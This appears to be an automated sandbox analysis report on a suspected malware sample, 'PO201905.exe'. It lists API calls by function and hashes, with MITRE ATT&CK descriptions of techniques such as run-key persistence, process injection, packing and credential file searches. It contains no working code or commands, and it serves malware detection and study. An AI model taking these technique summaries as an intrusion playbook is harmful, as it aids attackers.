API ID: Message$ExceptionFilterItemMetricsPaintProcessSendSystemUnhandledWindow_memset$BeepBeginBrushCharCreateCurrentDebuggerDeleteDestroyFillFocusIconLoadObjectPostPresentProcQuitRectSleepSolidTerminateTextUpper__isdigit_l__isxdigit_lwsprintf
String ID:
API String ID: 3436449669-0
Opcode ID: 09a57f6de0785e6d086ad1fc6eb35fbd602feb9bbf2dfd1cbde92c4f26670709
Instruction ID: 1305deff48d53e162fcb56b5f2687e86f257ad9b901b35737065a5f3ba7dd6a8
Opcode Fuzzy Hash: 09a57f6de0785e6d086ad1fc6eb35fbd602feb9bbf2dfd1cbde92c4f26670709
Instruction Fuzzy Hash: 67117336504124DBDB1CDF18D4D59A6F7E9FF8A310B04459FE5D38BA98DB30A501CB92

Uniqueness

Uniqueness Score: 100.00%

Function 01063FC1, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 01061D55: __lock.LIBCMT ref: 01061D57

__onexit_nolock.LIBCMT ref: 01063FD9

Part of subcall function 01063EDA: RtlDecodePointer.NTDLL(0112F7B0,010671A0,?,?,?,01063FDE,?,010693D0,0000000C,0106400A,?,?,01061BF0,010662CA,?), ref: 01063EEF
Part of subcall function 01063EDA: RtlDecodePointer.NTDLL(?,?,?,01063FDE,?,010693D0,0000000C,0106400A,?,?,01061BF0,010662CA,?), ref: 01063EFC
Part of subcall function 01063EDA: __realloc_crt.LIBCMT ref: 01063F39
Part of subcall function 01063EDA: __realloc_crt.LIBCMT ref: 01063F4F
Part of subcall function 01063EDA: EncodePointer.KERNEL32(00000000,?,?,?,01063FDE,?,010693D0,0000000C,0106400A,?,?,01061BF0,010662CA,?), ref: 01063F61
Part of subcall function 01063EDA: RtlEncodePointer.NTDLL(?,?,?,?,01063FDE,?,010693D0,0000000C,0106400A,?,?,01061BF0,010662CA,?), ref: 01063F75
Part of subcall function 01063EDA: RtlEncodePointer.NTDLL(-00000004,?,?,?,01063FDE,?,010693D0,0000000C,0106400A,?,?,01061BF0,010662CA,?), ref: 01063F7D

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 7fd373ea5727f3e296cae307acb350279508fec0f028d3bdd6459acf650257be
Instruction ID: d08ff3a5fdc6090462769959d85b35d75486e43a4419ce98984767d69d5d4f3c
Opcode Fuzzy Hash: 7fd373ea5727f3e296cae307acb350279508fec0f028d3bdd6459acf650257be
Instruction Fuzzy Hash: 8AD05E3094020BEADB10FFA4D800BCDB6787F20311F208108E0D8AA0D0CB7806018A50

Uniqueness

Uniqueness Score: 0.24%

Function 010617AF, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(Function_00001776,01061D95,00000000,00000000,00000000,00000000,00000000,00000000,773DF883,01062684,?,01061A50), ref: 010617B4

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 432cb99c371f4a9cb2cb18dd3710aa110ba191c11b20c1de94370f37100045c9
Instruction ID: e2daa290f08395a02065aef2d219c19611a24f1165b461599e0c6b905a6c5574
Opcode Fuzzy Hash: 432cb99c371f4a9cb2cb18dd3710aa110ba191c11b20c1de94370f37100045c9
Instruction Fuzzy Hash: F3A022B8080380CFB3300FA0A0080003B30F388A22F000028F8C0C028CCB38008CCF20

Uniqueness

Uniqueness Score: 0.04%

Function 010622C0, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,01064801,0112FB18,00000314,00000000,?,?,?,?,?,01062160,0112FB18,Microsoft Visual C++ Runtime Library,00012010), ref: 010622C2

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: f58250f4a1d47e6864eabb2d11cdb8b5be85e3293a5c4e978413068c2c5474a4
Instruction ID: bf8f347e02776212600bdf4e703a53e8e9a5b8d579aea2fbf296d54c948e3500
Opcode Fuzzy Hash: f58250f4a1d47e6864eabb2d11cdb8b5be85e3293a5c4e978413068c2c5474a4
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.04%

Non-executed Functions

Function 010616B6, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 01061CC7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01061CDC
UnhandledExceptionFilter.KERNEL32(010671B8), ref: 01061CE7
GetCurrentProcess.KERNEL32(C0000409), ref: 01061D03
TerminateProcess.KERNEL32(00000000), ref: 01061D0A

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: bc571006a559adf938bfa922fee453ab1198aba27a18a33dc259720a0ffe5689
Instruction ID: 66364258d762873a09e704a714f768e2c00fe5b68a5f71715c1ffc5d3b137f12
Opcode Fuzzy Hash: bc571006a559adf938bfa922fee453ab1198aba27a18a33dc259720a0ffe5689
Instruction Fuzzy Hash: 0621F0B8500226EFE738EF28F544644BBF4FB08B04F00416AE568D7258E7B555E28F54

Uniqueness

Uniqueness Score: 0.02%

Function 01062343, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,01069320,00000008,0106244B,00000000,00000000,?,?,01062478,?,01061787,01069270,00000008,010610B4), ref: 01062354
__lock.LIBCMT ref: 01062388

Part of subcall function 010641E2: __mtinitlocknum.LIBCMT ref: 010641F8
Part of subcall function 010641E2: __amsg_exit.LIBCMT ref: 01064204
Part of subcall function 010641E2: EnterCriticalSection.KERNEL32(0106AB78,0106AB78,?,0106238D,0000000D), ref: 0106420C

InterlockedIncrement.KERNEL32(837CBB20), ref: 01062395
__lock.LIBCMT ref: 010623A9
___addlocaleref.LIBCMT ref: 010623C7

Part of subcall function 01063045: InterlockedIncrement.KERNEL32(010610B4), ref: 01063057
Part of subcall function 01063045: InterlockedIncrement.KERNEL32(8B010671), ref: 01063064
Part of subcall function 01063045: InterlockedIncrement.KERNEL32(130460A3), ref: 01063071
Part of subcall function 01063045: InterlockedIncrement.KERNEL32(5051144D), ref: 0106307E
Part of subcall function 01063045: InterlockedIncrement.KERNEL32(8B010671), ref: 0106308B
Part of subcall function 01063045: InterlockedIncrement.KERNEL32(8B010671), ref: 010630A7
Part of subcall function 01063045: InterlockedIncrement.KERNEL32(D0458957), ref: 010630B7
Part of subcall function 01063045: InterlockedIncrement.KERNEL32(3D8B29C0), ref: 010630CD

Strings

KERNEL32.DLL, xrefs: 0106234F

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: IncrementInterlocked$__lock$CriticalEnterHandleModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 4007360741-2576044830
Opcode ID: 6672a36c17e71afa5857161b08a41a8c1bf65bf10dc7ad5d57e2facb5ad22de9
Instruction ID: e90fa3e399ee0ae19fb19b20a844c49856b34d26b7f0d6b084dbcf438ba38f45
Opcode Fuzzy Hash: 6672a36c17e71afa5857161b08a41a8c1bf65bf10dc7ad5d57e2facb5ad22de9
Instruction Fuzzy Hash: B1014475501701EFD720AF69D844789BBE8AF50325F10854EE5D5976A0CB74A644CB11

Uniqueness

Uniqueness Score: 1.40%

Function 01062B82, Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 01062B8E

Part of subcall function 01062470: __getptd_noexit.LIBCMT ref: 01062473
Part of subcall function 01062470: __amsg_exit.LIBCMT ref: 01062480

__amsg_exit.LIBCMT ref: 01062BAE

Part of subcall function 01061FDF: __FF_MSGBANNER.LIBCMT ref: 01061FE4
Part of subcall function 01061FDF: __NMSG_WRITE.LIBCMT ref: 01061FEC

__lock.LIBCMT ref: 01062BBE

Part of subcall function 010641E2: __mtinitlocknum.LIBCMT ref: 010641F8
Part of subcall function 010641E2: __amsg_exit.LIBCMT ref: 01064204
Part of subcall function 010641E2: EnterCriticalSection.KERNEL32(0106AB78,0106AB78,?,0106238D,0000000D), ref: 0106420C

InterlockedDecrement.KERNEL32(?), ref: 01062BDB
_free.LIBCMT ref: 01062BEE

Part of subcall function 01064B46: HeapFree.KERNEL32(00000000,00000000), ref: 01064B5C
Part of subcall function 01064B46: GetLastError.KERNEL32(00000000,?,01062461,00000000,?,?,01062478,?,01061787,01069270,00000008), ref: 01064B6E

InterlockedIncrement.KERNEL32(00631630), ref: 01062C06

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: __amsg_exit$Interlocked$CriticalDecrementEnterErrorFreeHeapIncrementLastSection__getptd__getptd_noexit__lock__mtinitlocknum_free
String ID:
API String ID: 741022032-0
Opcode ID: 57227be9ebfe3ccb87d64e33a344ea392908aa2d268f0ef63c2b3703e4b109c8
Instruction ID: 94a2947be6aac69b00d3b2a62d32e6dd872f006ea04270584c59ec5229197df1
Opcode Fuzzy Hash: 57227be9ebfe3ccb87d64e33a344ea392908aa2d268f0ef63c2b3703e4b109c8
Instruction Fuzzy Hash: 7C01C031A00613EBE761EF699404B9D77A8BF00720F011044E9D0A7294CB395980CFD2

Uniqueness

Uniqueness Score: 0.65%

Function 01065D59, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 01065D67

Part of subcall function 010616C5: __FF_MSGBANNER.LIBCMT ref: 010616DE
Part of subcall function 010616C5: __NMSG_WRITE.LIBCMT ref: 010616E5
Part of subcall function 010616C5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,01064B91,010610B4,00000001,010610B4,?,0106416D,00000018,010693F0,0000000C,010641FD), ref: 0106170A

_free.LIBCMT ref: 01065D7A

Part of subcall function 01064B46: HeapFree.KERNEL32(00000000,00000000), ref: 01064B5C
Part of subcall function 01064B46: GetLastError.KERNEL32(00000000,?,01062461,00000000,?,?,01062478,?,01061787,01069270,00000008), ref: 01064B6E

HeapReAlloc.KERNEL32(00000000,00000000,010662CA,00000000,00000000,?,01064C25,?,010662CA,00000000,00000000,?,01063F54,00000000,00000010), ref: 01065D98
GetLastError.KERNEL32(?,01064C25,?,010662CA,00000000,00000000,?,01063F54,00000000,00000010,?,?,?,01063FDE,?,010693D0), ref: 01065DF3

Part of subcall function 0106228D: DecodePointer.KERNEL32(?,01065D33,00000008,00000000,?,01064BDB,010610B4,00000008,00000000,00000000,00000000,?,01062422,00000001,00000214), ref: 01062298

GetLastError.KERNEL32(?,01064C25,?,010662CA,00000000,00000000,?,01063F54,00000000,00000010,?,?,?,01063FDE,?,010693D0), ref: 01065DDB

Part of subcall function 0106226B: __getptd_noexit.LIBCMT ref: 0106226B

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ErrorHeapLast$AllocAllocateDecodeFreePointer__getptd_noexit_free_malloc
String ID:
API String ID: 3288285875-0
Opcode ID: e890c5c2f10bdf46c00c9adfc9d6db77974ab5c49ff5e5e02ff8ac8d14c45c8c
Instruction ID: b018b7d673489db65438ce902400f8634d0b757d78a5ff1f8dce6bc3c9fd645e
Opcode Fuzzy Hash: e890c5c2f10bdf46c00c9adfc9d6db77974ab5c49ff5e5e02ff8ac8d14c45c8c
Instruction Fuzzy Hash: 5611C632505A13BBCB323B78AC0869D3BEDAF643E0F254565F8D99B1D0DA35C94287A0

Uniqueness

Uniqueness Score: 0.51%

Function 01063305, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 01063311

Part of subcall function 01062470: __getptd_noexit.LIBCMT ref: 01062473
Part of subcall function 01062470: __amsg_exit.LIBCMT ref: 01062480

__getptd.LIBCMT ref: 01063328
__amsg_exit.LIBCMT ref: 01063336

Part of subcall function 01061FDF: __FF_MSGBANNER.LIBCMT ref: 01061FE4
Part of subcall function 01061FDF: __NMSG_WRITE.LIBCMT ref: 01061FEC

__lock.LIBCMT ref: 01063346

Part of subcall function 010641E2: __mtinitlocknum.LIBCMT ref: 010641F8
Part of subcall function 010641E2: __amsg_exit.LIBCMT ref: 01064204
Part of subcall function 010641E2: EnterCriticalSection.KERNEL32(0106AB78,0106AB78,?,0106238D,0000000D), ref: 0106420C

__updatetlocinfoEx_nolock.LIBCMT ref: 0106335A

Part of subcall function 010632B8: ___addlocaleref.LIBCMT ref: 010632D6
Part of subcall function 010632B8: ___removelocaleref.LIBCMT ref: 010632E1
Part of subcall function 010632B8: ___freetlocinfo.LIBCMT ref: 010632F5

Memory Dump Source

Source File: 0000000C.00000001.4606226270.01061000.00000020.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000C.00000001.4606191992.01060000.00000002.sdmp Download File
Associated: 0000000C.00000001.4607918073.01067000.00000002.sdmp Download File
Associated: 0000000C.00000001.4608979018.0106A000.00000040.sdmp Download File
Associated: 0000000C.00000001.4609713673.0106B000.00000080.sdmp Download File
Associated: 0000000C.00000001.4653733927.0112F000.00000040.sdmp Download File
Associated: 0000000C.00000001.4654609442.01131000.00000002.sdmp Download File

Yara matches

Similarity

API ID: __amsg_exit$__getptd$CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__getptd_noexit__lock__mtinitlocknum__updatetlocinfo
String ID:
API String ID: 2777350688-0
Opcode ID: ea872dc897ac24072a439800fb71ab284f55c735d3c2cae6fdb3db76ff7260e1
Instruction ID: dffa55828ad20d3cbb1582914c95dbbca2215a05d32ab495bf1fa0af52fe9224
Opcode Fuzzy Hash: ea872dc897ac24072a439800fb71ab284f55c735d3c2cae6fdb3db76ff7260e1
Instruction Fuzzy Hash: 32F0B432A41322DBE761BB689401BCE7BE87F20724F11C149D5D8AF3D1CF3949408AD5

Uniqueness

Uniqueness Score: 0.57%

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO201905.exe

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus and Machine Learning Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries